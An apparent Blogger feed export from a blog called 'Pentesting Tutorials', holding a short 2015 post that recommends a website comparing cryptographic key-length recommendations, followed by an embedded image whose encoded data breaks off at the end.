tag:blogger.com,1999:blog-45093494815808953652024-03-13T10:12:28.631+05:30Pentesting TutorialsBlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.comBlogger24125tag:blogger.com,1999:blog-4509349481580895365.post-48132732300810454642015-09-25T09:51:00.001+05:302015-09-25T09:51:25.439+05:30All about keylength<div dir="ltr" style="text-align: left;" trbidi="on">
Recently came across a site about keylength which have amazing calculations and decided to share it with you<br />
<br />
In most cryptographic functions, the key length is an important security parameter. Both academic and private organizations provide recommendations and mathematical formulas to approximate the minimum key size requirement for security. Despite the availability of these publications, choosing an appropriate key size to protect your system from attacks remains a headache as you need to read and understand all these papers.<br /><br />This web site implements mathematical formulas and summarizes reports from well-known organizations allowing you to quickly evaluate the minimum security requirements for your system. You can also easily compare all these techniques and find the appropriate key length for your desired level of protection. The lengths provided here are designed to resist mathematic attacks; they do not take algorithmic attacks, hardware flaws, etc. into account.<br /> <br /> <br />
SIte : http://www.keylength.com/en/compare/<br />
<br />
<br />
<img alt="" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABaAAAANpCAYAAAD9l56OAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF7snQecXUXZh9/N7qb33hNIICGh99A7iCCCiIr0JlKliPDRpIvSQUCqdGwIIggIIr2TAIFAQhII6b1uze5+55kw68nJuf3erf/57f3tvadMeWbOOXP+8847RUOHDq0zBREQAREQAREQAREQAREQAREQAREQAREQAREQARFoJQT22muvgpb0xRdfXCf+1pJmtOAl0Q36LQIiIAIiIAIiIAIiIAIiIAIiIAIiIAIiIAIiIAItnQAi8cYbb5zXYk6cONGSCc2tJc0wVAnQeW1iikwEREAEREAEREAEREAEREAEREAEREAEREAERKC5EKira3jnEK0lTd8G2jSXxqB8ioAIiIAIiIAIiIAIiIAIiIAIiIAIiIAIiIAIiIAI5IdATU2NlZWVGf+jIdm+6LGpfssCOhUh7RcBERABERABERABERABERABERABERABERABEWiRBJqKNfLcuXPT4tu/f/+0joseFC0nAnNlZaVzF/LSSy9ZmzZtrF27du40trOffbgMYXtxcXE0yrR/S4BOG5UOFAEREAEREAEREAEREAEREAEREAEREAEREAEREIHCEBg/fnzSiLfYYouk+zPZWVVVZXvvvbdddNFFdvjhh9tJJ53khGdCUVGR3XfffTZixAj3HRG6Q4cOmUS/1rFywZE1Op0oAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiLQnAlgGZzPTzos4tJL5zyOyfbc6HmlpaXO8nnq1KlOaL7rrrvqs8B3trGPY7CAjp6fbn45ThbQmdDSsSIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiJQIAKJrJxTWUdnmh1caqxevdpOPPFEu/vuu53gfO+99zqL5+HDhzvxmX0EtuUSJEDnQk/nioAIiIAIiIAIiIAIiIAIiIAIiIAIiIAIiIAIiECOBLyPZv5H/Tx7/9D+mByTqj8dy+aKigo74YQT7P7777f11lvP7fvqq6/cNtJr3759zsnJBUfOCBWBCIiACIiACIiACIiACIiACIiACIiACIiACIiACIhAHAEJ0HFUtE0EREAEREAERKDRCfz973+36DSzffbZx2278cYb3SrN+QjER1oNFVi8o2PHjusk11D52Gyzzey6666zp556yt555x375z//aRdffLENGjRonTy1hg1R7tHfUQa+XT7yyCPrTEU8++yzXfuMtttoHNHfDdUm4q6paF7y9bsQnFLlLVp3qX6nii+835fH16//z7VEiKaVSdzhY7t162ZXXHGFPf/88/b6668b7axTp07ZRqfzREAEREAEREAEciCA1XGyTw5RN5lTsX7GvcY999zj3G5g+cyH72xjH8fkGuSCI1eCOl8EREAEREAERKBBCIwaNcouv/xymz59ul144YVWW1vbIOnmO5FHH33UdegS+XbLd3rh+H7+8587P25MpZsyZYq9+uqrVlNTY23btrXFixcXMukWF/eYMWNs6623tvfee8+VDeHw0EMPzaqcjdkmsspwBiflk1OqZN98802bP39+qsNy2o8wHA4TJ050P/OV9jnnnGMHHHCAffjhh/baa6/ZihUrbNWqVTnlWSeLgAiIgAiIgAgkJ1BdXR17AP3kTz75JHbfJptsYonOiz0hsjHuXNIj8H/WrFmx0bAv7tzYg1OkyfsUH1xv+AUHjzvuOHfWfffd57YhQh977LFOhMZndLZBAnS25HSeCIiACIiACIhAgxHo0aOH3XTTTa6z9Ytf/MLKysoaLO2WktB2221nJ510ks2cOdPOPfdc++KLL1pK0RqlHAiDxxxzTL0A/ZOf/MT5x0MslMXq/6qkITmdeuqpBW8L559/fmwa+Up74403dvGfccYZEp5jSWujCIiACIiACOSfgBd+ozEnM3hhX6LzovHE/Y4716eXSPQmnlzSjaZZXl5u3/nOd5zQ/OWXXzqhmUUJCfRzEaZHjhxpe+yxh/3rX/8yZu1lGyRAZ0tO54mACIiACIiACDQIgZKSEucyol+/fnbaaafZjBkz1kp34MCBdt555zlr1CVLltjTTz/tVm+mg/Xggw8a1gk//OEPXaeKsP3229sdd9xhDzzwgBO1oyFZfBzLVPt3333XWbwOHTrUxXvllVfa5MmTXVS4CWHBDvZhrT1v3jzbddddncVz2DWD/07ZmGZP6Nmzp8sXHT3iYyr+tGnT3L5cw1FHHeWiuPTSS5OKz0yz23///Y3jKcOcOXPsT3/6k/3lL39xHV7yjeV09+7dbYMNNnD18de//tX23HNPx/rrr7+2q666yj777DOXHsdjzUnZYMt+LCleeOEFt/+aa66xrbbayvGcPXu2iwuLYKy0w7w4FvH8wAMPdPEkqnMXaSQkSyN6bLq/H3/8cWdNvuGGG7p8IUD/+9//dr+jAnSy/ObSJlLV1U477WQnn3yyMXuA6ygatt12Wzv99NPdYjNVVVWubji+srIyemjWvzPhlKw8uIj5xz/+sU4+aGu0GQIsmTJ68MEHr3Nc3IZ8toto2tm03fA5uN8gPPnkk3bZZZe56a+JrkvaHoNK3M+4f7Bo0RNPPOEsp37605+6ulUQAREQAREQARFITCCRRTHvE6NHj054YqLzEp4Q2hF3bqr0/Olx52aTJv2LZ5991vW7EZj5z8xIAhbPRxxxhO27775uH+4Ps02X+NbtiaaTYx0jAiIgAiIgAiIgAg1E4KyzzrItt9zSbr/9djfNPRxYtfnOO++0zp07O9EZoQ03E4zmP/TQQ/bwww/btddeawcddJBdf/317lQ6UYQ4v8+p4vNpb7755k5AxToBtwuXXHKJ66DtsMMOLj1EZ6atEd+PfvSj+ixfdNFFzoK7d+/exneCF2r5jgUtgi7is48X64NoIJ1f/vKX0c3u99VXX11vlRs+AGF05cqV64i60UgQeBG8Pv74Y1eW3Xff3bD6RHxGhCYg4lN+n09corzyyivOnzTlpWyHH354fdTUCyI2wuYhhxxiv/nNb5xrgbfeest1bu+66y43YOCFNIR7X9dYYXAcrhUYhEi3jsLlSpVGlEE6vx977DEn0lM/kyZNsq5du7o2CLNwSJXfXNpEsrqaOnWq3Xzzza4t/v73v3cvE0ceeaS7Vnwgr9QJ1xb1SxuJC9m0Nx9Pupw4Pll5aG8MXBBgirCK25iXXnopLstpbcumXUTvG0xTZeArLmTaduPawjfffOOiTsYGxrvttpudcsop7jrEjQcDDv/3f/8n8TmuYrRNBERABERABCIE6A/FDdZjcJEsRC2KOTaZ1XQ4rrg0U6Xnz4+mm0uaiM6sDVNaWupcbPi4/Xe/j7TD6aabps+zBOhkLUn7REAEREAEREAEGp0AQihiJovnMfIe7uxg4TlkyBBnKYzFH6P4Y8eOte9+97tOgEacYuEQfKrecsstbj+Wuh988IGz9oyGVPH547HUZeE+H58X7r73ve+5Q7DOJd8Epqx5i9hnnnnGWUcjQPM9GqLxbrTRRtFD3G8WMcSPdFxINDWOTnU6HUVESjqXCOUIa1hFYPXw4x//uF6AjuYTFykcT9h7772dBXc4LFiwwG699Va3CetxpvMhqCEsI3b7gCj9u9/9ztW1F6CxLsYdgQ/UX7I6D6frv6dKI+6cVNtg87e//c1xGTdunLMK91bw4XNTtalc2kSyusLFCtfLr371q3rfhUyxDAvQDEjQXhBKES6xVo4L2bQ3H0+6nDg+WXkY/EBIJ3B9UTYE20Tib1w5otuyaRfR6y7ZYqiZtt1kbSEVGwbBYMRgTp8+feyGG25wft4VREAEREAEREAEEhNAfKU/T3+C/joiLL+zDfS16V8RB3HHhaaYJu8J5Mu73wjnO25fOuWMll0CdJSIfouACIiACIiACDQpAiz6hQUtPslwF4BVpw8IkQTEYD4+LF++3H1FSMWdw9lnn20777yz+92lS5dY62eOTxVffQLffqGjtmzZMkOAJeCyghAnREbPTfY7Gm/02BdffDHjRQzJEy4XWBTu008/jUZZ/3vw4MGGYOyFPabv49aA86IhLp+wx91GouB9TyPkYZWL6wBEes7xHf5EIjpxZlpH2aSRKO/R7bh4weIbaxVvnRs9JtP8Rs/3v+NYJ6sr70YjmQh5wQUXuAU9+Y9QzWAD1unRRe+yaW/hcqTDieOTlcfHh6CPpTyuJt55551EuFJuz7Zd5LJ4aC5tIRUbXOXgygc/7wy6ebc+KUHoABEQAREQARFoxQQWLVrk+h8MGtOnz0egP8szP9EgeWtJM8pSAnSUiH6LgAiIgAiIgAg0OQK33Xab87+GuwOEVCxyCYguhF//+tdu6lhcYMo8fm2///3vO2ENK1sEtXDwU+7SiS8uDb8NdwdYLSOufv7558kOXWuKW9ID87QTIR4BGp+5WJAmEslhQKcZn8x0xLEEQVinY56P4C1ISQcraPxzU7+4S2FfIitcn3amdZROGtEpl9HficpNfeOeBIuZRIvFZJLf8LTHRGmGtyerq3Ta4sSJE50rC2YNYL2P2xdcwNx9993pJJ/2MelwIrJk5WF/r169nMU8Lk+8NXSqTETr0v9Op12kijvT/Zm0hWjcqdhwveLeBrci+IDmu/eNHY1Lv0VABERABERABNYQoE/BzDtmM+Zi+RzmidEA4jNxx4XWkma07BKgo0T0WwREQAREQAREoMkRYJoXVpqIlIjNuM/AdzJuA3AHceaZZzor1IULFzrxhcW3nnvuOVcOpsGxkBeuElg4A0E6vMhaWVmZW9Tu+OOPtwkTJqSMLxkcpsDji/W3v/2ts7zG2prp8OGAdTFCK76aES2xRo4uWJYsjWz3wQp++KrGZyyLJyIq+8VEcFECS/KNVSxT+Fn0jQUUcRmSruAXlz8YsGAf4j+CJwFW+HQmYFUKFxaSTBXSqfNwHH4qYaI0wvWPe5Do70TCsk8jOpgRzX86+c22TSSrK3xmp2qLWCZ/9NFH9Qt0kvd8LkAYZpGKE8cmKw8vhZdffrmzlH/vvfecpS+BayfqG96nG63L8G/8rRMStQsfRz7/p9MWEqWXjA3ncH9EoGemCDM+8BGPG6BEA02J0tF2ERABERABEWhNBOj30P9ryNBa0owybRPdoN8iIAIiIAIiIAIi0BQJYI3LgoS40bjxxhud2IK1Hz6V33//fSdsIsIgmLJIWTgguBLYHl1EjEUMsYxGmEUoTSe+RHwQwnApgeiN32JcS0R9xOJCBPF8l112ce4bWNCwoQILMbJI42uvvebEcdwZ4FoDtxlekMOXNlbSCPrwxPoZ4S+RhXk6ecdCmAXSqD9EaBZJe/vtt53LBwYHYIBghiuTVKtrp1vnPl+p0gjX/6BBg9yilr498DvXkE5+s20Tyeoq3BbhDn/vi9yXCeEbv9AMOLDQIG4bUlmg58oj2fnJysP0WPJIYCFRrlM+yQYtonUZ/o1bmUzbXrK8p7MvnbaQKJ5kbPC7DhNEagYULr30UhcNA2H471YQAREQAREQAREQgcYmUBS8VMR7xW7snCl9ERABERABERABEcgTAcRUfEnjDxehuaEC4vPLL7/sRGh8ULfGgIUqYt/BBx/cGouvMouACIiACIiACIiACIhAqycgFxytvgkIgAiIgAiIgAi0fAL4Q2XRMawICxlw/zFgwACbPn26W0kan7pdu3Zt8Kl9hSyj4hYBERABERABERABERABERCBTAhIgM6Elo4VAREQAREQARFodgRYdOywww6z8vLyer/QhSoEfmmjlr5VVVX2hz/8oVBJKl4REAEREAEREAEREAEREAERaNIEJEA36epR5kRABERABERABHIlMHbsWGNBNhbUYxGyQgb8S+PnFb/KuN1gAbC//vWv9vnnnxcy2SYdN4v4zZkzp0nnUZkTAREQAREQAREQAREQAREoHAH5gC4cW8UsAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAq2aQJtWXXoVXgREQAREQAREQAREQAREQAREQAREQAREQAREQAREoGAEJEAXDK0iFgEREAEREAEREAEREAEREAEREAEREAEREAEREIHWTUACdOuuf5VeBERABERABERABERABERABERABERABERABERABApGQAJ0wdAqYhEQAREQAREQAREQAREQAREQAREQAREQAREQARFo3QSKJk6cWNe6Eaj0IiACIiACIiACIiACIiACIiACIiACIiACIiACIiAChSAgC+hCUFWcIiACIiACIiACIiACIiACIiACIiACIiACIiACIiACJgFajUAEREAEREAEREAEREAEREAEREAEREAEREAEREAERKAgBCRAFwSrIhUBERABERABERABERABERABERABERABERABERABEZAArTYgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiJQEAISoAuCVZGKgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAhIgFYbEAEREAEREAEREAEREAEREAEREAEREAEREAEREAERKAgBCdAFwapIRUAEREAEREAEREAEREAEREAEREAEREAEREAEREAEJECrDYiACIiACIiACIiACIiACIiACIiACIiACIiACIiACBSEQKsRoMePH2/l5eUFgdgSIp07d66tXr06tijJ9sWeoI1rEfjwww+toqKiUag0ZtqNUuA8JJqsvSfbl4ekFYUIiIAIiIAIiIAIiIAIiIAIiIAIiIAItDgCKQXoH//4xxb9XHHFFVZbW+tg/PSnP7WZM2eu872QpKL54fcFF1yQNMnrrrvOFi1aVNB8ksZVV121Tj5gdcopp9iLL77o9pHf2bNnr3NcY274xS9+YfPnz4/NQnRfU8x/bMbT2Ej79e3p8MMPt/POO88mTJhgdXV1aZyd3iG//e1vbfHixekdnOejGjLtJ554Yp17RfhaffPNN3Pm2hBt75xzzjGE5riQbF/c8Q2R37h0tU0EREAEREAEREAEREAEREAEREAEREAEmgqBknQyguDcr1+/+kNLS0utTZs12vUdd9xhnTt3TieavB4TzVNJSVpFcXkI53nBggV288032+WXX15fpmwzuuOOO9qtt95qK1euXIvJl19+aUuXLrVtt93WRX3XXXc1CrNsyxU9L93855NtNA/5/H3ZZZfZgAEDbNmyZfbWW2/ZLbfc4tpIu3bt8plMi4/rgAMOsL322suVc968eXbxxRfbnXfeWX9ddejQwYqKilo8BxVQBERABERABERABERABERABERABERABETgfwTSUm07depkXbt2jeWWaHvswXncmCxPqZIJ57m6utqmTZuWs2UmaW611VaGOP/+++/bbrvtVp+Nd955xzbddNN6ho3FLBWXdPenm/98sk03b9kc59sS5erVq5c9+eSTzl2LBOjMaLZt29b4EBiEIXTp0sWKi4szi0hHi4AIiIAIiIAIiIAIiIAIiIAIiIAIiIAItBgCaQnQyUqLC4Nrr73WBg8evM5h+BR+/PHHjan3VVVVttlmm9kxxxzjRKlCBtJCRHz99ddj3Ur4POM6BGtXXGSwjXDhhRfaJptsklX2EN+23nprQ3D2AjSuHN5991077LDD6uNkWv4NN9xgAwcOdH6Xw4wQqmGEGPrss886Mfuiiy5yVqTEde6559oGG2xgJ510ktuGZTXuPShH7969s8p3pieF8//RRx/ZX/7yF5sxY4Z17NjRCe0nn3yyvffee86yPMwWNynsxx/yww8/bPjlZv/mm29uRx99tGEhSzjqqKNsn332sVdeecXx+cEPfuDa0NVXX12fVRj/7W9/M1xM5COQD9xkPP30066dhkV2xOhHHnnE8Kccl1/2JytPOH9Tpkyx3/3ud3bGGWfYxhtv7Mq6zTbbOBYMXuy55562YsUK++CDDwwBH7cgu+++e30Ud999t9vHMX369HHnb7HFFs6y+Nhjj7U99tjDXnvtNXfuvffeuxaaaNrU3Z///Gf75ptvXN1R7p///Of5wJkwDs+S8tbU1Lg0qXvSJ2TCkuMbowzhwtE+//SnP9kbb7yR1j2O+tppp53c9cG5zIo4/vjj64X7hOC0QwREQAREQAREQAREQAREQAREQAREQASaKYG0BOizzz57reKdddZZTjhJNZ3+scces8mTJxvnY2WKIIZQlw+RK5qnE044oX76P4LQxx9/bCeeeKL179/f5syZY7/5zW/WqaLtt9/ehg4d6kTdhx56KC+WmohL+IIuKytzotr06dOdaweso+NClNH999/vxM6f/exntt1227nvnN+jRw/na5vvCKHeRzEC9YgRI/IiPkeZxuU3vA2hH5H5Jz/5iROR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CDRbAkUTJ06sa7a5V8ZbFQGshlm0jcENBjkURKC5EWARTdyw4L9dQQREQAREQAREQAREQAREQAREQAREQARaA4G8uuBoDcBUxsYj8PHHHzsr9VGjRjVeJpSyCIiACIiACIiACIiACIiACIiACIiACIiACIhA2gSSuuDAWi9ZwM1FMr+9yc7Ndl+qPD3++OPZRp3zeamD5dXLAAAgAElEQVTyRgKNmb+cCxiJIFl5C9E2Xn75ZecvOLzAYS5lwj1KTU1N0igKUY6kCTbjncnaA8VqDixTlSFcPc2hPM24OSnrIiACIiACIiACIiACIiACIiACIiACLYSAXHC0kIps6cVgccjLLrvMTjvtNBswYEBLL67K10IJyAVHC61YFUsEREAEREAEREAEREAEREAEREAERCAhAQnQCdFohwiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIQC4E5AM6F3o6VwREQAREQAREQAREQAREQAREQAREQAREQAREQAREICEBCdAJ0WiHCIiACIiACIiACIiACIiACIiACIiACIiACIiACIhALgQkQOdCT+eKgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAgkJFCScE+OO+rq6sx/amvrrLau1v0uCuKtra3NMXadLgJNj0CbNm2sLshWUVGRtSlqY23aFLnv/tP0cqwciYAIiIAIiIAIiIAIiIAIiIAIiIAIiIAIiEBhCeRdgEZkRmBeXVNjFRUVtnJlua0qr7DK6iqrqamzmtqaQIRGhlYQgZZFIBhyseI2xVZcXGTtSttapw7trXPnDta+fXsrKS4OBOk2ToxWEAEREAEREAEREAEREAEREAEREAEREAEREIHWQiBvAnS98Lx6tS1ZtsIWL11m1YHg3L93TxsxoJ916tgh+HQMxLliKynJW7KtpZ5UzmZAYHXQ9muCgZdVZWXBp9wWLlxsX89eYCWBo5ue3btZj25dXNuXEN0MKlNZFAEREAEREAEREAEREAEREAEREAEREAERyAuBookTJ+I1IKeA+Lx6dY0tXbHCFi1eam0D68/RG46wAf37OYtPLKI5huD/55SgThaBJkrAWzg7Nxy45Aja/dz5823S519aVTALoFfP7ta9C0J0sayhm2gdKlsiIAIiIAIiIAIiIAIiIAIiIAIiIAIiIAL5I5CzKTLick1Nrc2et8AWLVluW2w21oYPHWx1bntN/nKqmESgGRAID7R4X+f9+vSxgf3727Svv7HxH31qZd0rgt99gtkA+InWOqDNoFqVRREQAREQAREQAREQAREQAREQAREQAREQgSwJ5CRAI7Y58XnufFu+cpXtscv21qVzZ1tdXZ1ldnSaCLQ8AgzE8Bk6aEDgiqOrvfrGO2Zz6wIRuq8WKGx51a0SiYAIiIAIiIAIiIAIiIAIiIAIiIAIiIAIhAjkJEBj4bloyVJbGFg+77HrOOfjWVbPal8iEE+Aa6Njhw62847b2Uv/fdPatWtrfXr1cH7RFURABERABERABERABERABERABERABERABESgJRLIev4/4jOLri1YvNg232SMdQ7EZ/l3bolNRGXKJwGukU6BCL3VFhvb/EWL3TXkXXXkMx3FJQIiIAIiIAIiIAIiIAIiIAIiIAIiIAIiIAJNgUDWFtC1tXWB3+eF1r5dJxsyqH/GItqysgrr2LbUXpy5wl5ZVmrTVtXabZu3t74dS5sCF+VBBApGABF6ULBA51dfzbRZgfuaoYMGBr6gC5acIhYBERABERABERABERABERABERABERABERCBRiOQleyFxWZ1dZXNXbDINtlog7Qtn+evKLcnZlbahKU1trSurX2wrM7ad+psW/QqtSGdS+yQd8rtxVkrGw2GEhaBhiLANbTRqPWDa2ixVVVVZjyA01D5VDoiIAIiIAIiIAIiIAIiIAIiIAIiIAIiIAIikAuBrCygseBcuHiZ9erR3bp27ZyWAP2f2WX2SVmx7dy7xK6YvNpeWVjr8l0XfIqCz5FD2tj9W3eycz4pty9WrbJTNuiYS7l0rgg0eQJdu3Sx3j17BH7UlwcLErbLKr8lJSVWWrr2rAHcelRrIdCseOokERABERABERABERABERABERABERABERCB/BLISoBeHSymtnjJMttg5HpWlIbvgAkLyuzN5cU2rmepHf1Rjc0pD2Tn4kB2LkJ6Nhvars4OHVBsP3y3yo4bGrjlWFhtIzqW2b6DJELnt7oVW1MiUBS0/yGDBtikyVOsb5+eWS1GiAC9ww47BFbUVfVFe/nll43tCiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiLQ2AQydsGB9XN1VbWtKK+wPr16BibMdc4COtGnPBDG7p1dbDv2LLZfTArE54paKyoJhOe2bayofRsb0MnslrHFdubnNTZzdZFdPqXWDhlQavfOLLLyyuqE8ZLebrvtZl9//XX9MStWrLBjjz3Wrr/+eufSIFGeMtkeTSOTc/N57J133mmLgwUf8xmnjwvx8uGHH7bTTjvN9ttvPzvwwAPt5JNPttdee60g6RWiDA0d56effmpHHHGETZo0qZ4R36PbUuWLa2hVeZW7pjg2mzBo0CAbMGBA/SdqEZ1NnDpHBERABERABERABERABERABERABERABERABPJBICsBetmKldata5fAyrI4ZR6enVVhIwKR+defVzvx2RCf2wXCc4di26lTkd27YRu7+Ruzb+raWF1J8GlTZLdOW22bdy+yNwNL6HQDLgcuvfRS69+/v5155pmBcfUa6+p0z28qx82dO9dOOeWUdXwC/+Uvf7GlS5fmPZurAncnJ510ko0fP96OPPJIu//+++2uu+6y4447zgYOHJj39FpKhDfddJNrY7/+9a9t2rRp9uWXX7rvbLvhhhvSLibXUPduXY1rKl0BGuvmDh06uA9ic9u2ba19+/b1n+Li4vr9soROuyp0oAiIgAiIgAiIgAiIgAiIgAiIgAiIgAiIQAEIZDxPv7a2zpavXGU9u3Z10/xTiWb/WNrW9uph9umqIisK9Oq6QIAeFAjQO7cvsiP7r7biwOhzk7bFNiewhv68tsbqaopsWkUb6xUc++8lxbb7gORWoaSPtTNWz2VlZXbllVdam8AtSKp8ZcLSW7Fmck62x1ZWVtrkyZNdmeJE9HyWizzed9991qdPH7vmmmscNx/69evnvuY7vWy5NLXzrr76atfm5s+fbxdccIHLXufOna1v3752zjnnpM2Na4hradmKZdavT++gDlKXFNF5zz33tJrAFQ5h8ODBTnz2YZ999qlP/7///a/hE1pBBERABERABERABERABERABERABERABERABBqDQMYCdE0gEq9YVRYsmtY/EEhTC73Ty80qugYicmCQjHVzceD7eUSgOv+oT7U99mWFLa4oshNGl9qS6hL7KrCALg+MnusCK9LqQIB9d8Ua1x7JwCCQPvjgg/bJJ5/Yrbfeau3atVtL/EN8Q2TFL255ebltvfXWztVE9+7dDatiBDrO8+Lrq6++ag899JDdfffd9cmGBWjiu+eee9x5FRUVts0229jpp58eLMbY1R2///7729577+0sihcsWGAIuWeddZZtttlmbj+W2uTnP//5jy1cuLA+jZdeesleeeUVJ6AjPhMH4dprr7WtttrKfccqmYAwPXToUPvFL35hm2yySaxQ7Q5MI5DuZZdd5uJIJjYj7uMG5J133nH522677eznP/+5deoUmLcHAbcdbHv//ffdwAQccIny1ltvOf/Exx9/vNvmRXW+I6K+/vrrTkjdaaedXHmw5iVcd9119vbbb7s4YIhV+Pbbb+/2ce5BBx1kzz//vBNX//GPf7j/yerFnZjH0LNnTzv33HOdCO25kU/E5x49eiRlGc4GPLp362wz584xrq0SSz2rgPM32GCDdazkfbzsUxABERABERABERABERABERABERABERABERCBpkAgDXvL/2UToa02EAtXlpVbz+5dAjExdRECt86BsLbmOA7ns1X7avt6RbX96ZsK+/eCcvvtxJX2/T419dIbxwSG1ra6LnUCCKiPPfaYs+BFVI6Ge++91yZOnGgXX3yxE5qXL1/uXEwgoiKATp061WbMmFF/2r///W/DgjRRQJjG/y/uFohvyZIlTpj1AQtmrFERIv/4xz/apptuarhr8OH222+3Dz/80OXngQcesFNPPbV+36677mrkFzH8hRdeMMqGYO5F20MOOcQJnvhrHjt2rN1yyy1pC51x5Vm2bJnxGTlyZNzutbZR1nnz5jlhHgEdcf3mm29eq9xYUt944432gx/8wNUJjBHUDz30UPv973/vBgB8gNMWW2zhjqMc1EHYdQXCPufiEgQ/3Ijk3uKXc3v37m133HFH/UBBqnpJWcAsDkD05prAIpkP37OxNu7WrYu7pri2kg0ChLMYdrmR7HsWxdIpIiACIiACIiACIiACIiACIiACIiACIiACIpA3AhkL0GXB4oOlxSX1lsbeOjjR//7tAtcbFijQgaDMGmuI0S9WtLPSQGQ9fliJDWxTY+eP6Wi3zymxClRn91dnZKx/hzVWuYnihsKQIUOcYPvGG2848S78QQx8+umn7cQTT3T+jLt06WL77ruvs9JFHMVSFaHzxRdfdOImPpbZt/vuu9fH40l7cRFrWxbow9c08bFo37vvvrvW8d/97ned8Iw7BiyDv/nmG7cfi+lnn33Wzj77bCcgs3gcAjPB5zucXrgsbCdeLKmxtP3e977nRNtEiy0iroc/UTb89sELqXHHsA0LZhj97Gc/c2XG1QTfsSrHotvHBdvhw4e7fCKaH3zwwTZixAg74IADnDCLaB0uJ8I3FuvDhg2zM844w1mA+7zssssuNmrUKLewHsI7ecA/tk+LeoMvH28FnaxeEpUt2+1YryPAL1q0yHr16mVYRPPdb8sk3naB1Xdpcalxbfny1VdOgi/JROfwvgSna7MIiIAIiIAIiIAIiIAIiIAIiIAIiIAIiIAINAiBjFxwII6xWFqP7mv8P6eTw3Gdqq2qqMQ6W42tqg0E5Zo6m1JZaw8s72An9q6zg4a1t1tmt7UPqousZnWgTgcidKe6WqsMIh/XBR+3yV0SbLjhhs6a+JJLLnGiMMKlDwiCCJe4dkgUsHbGgvmoo45yAujmm2/uBMW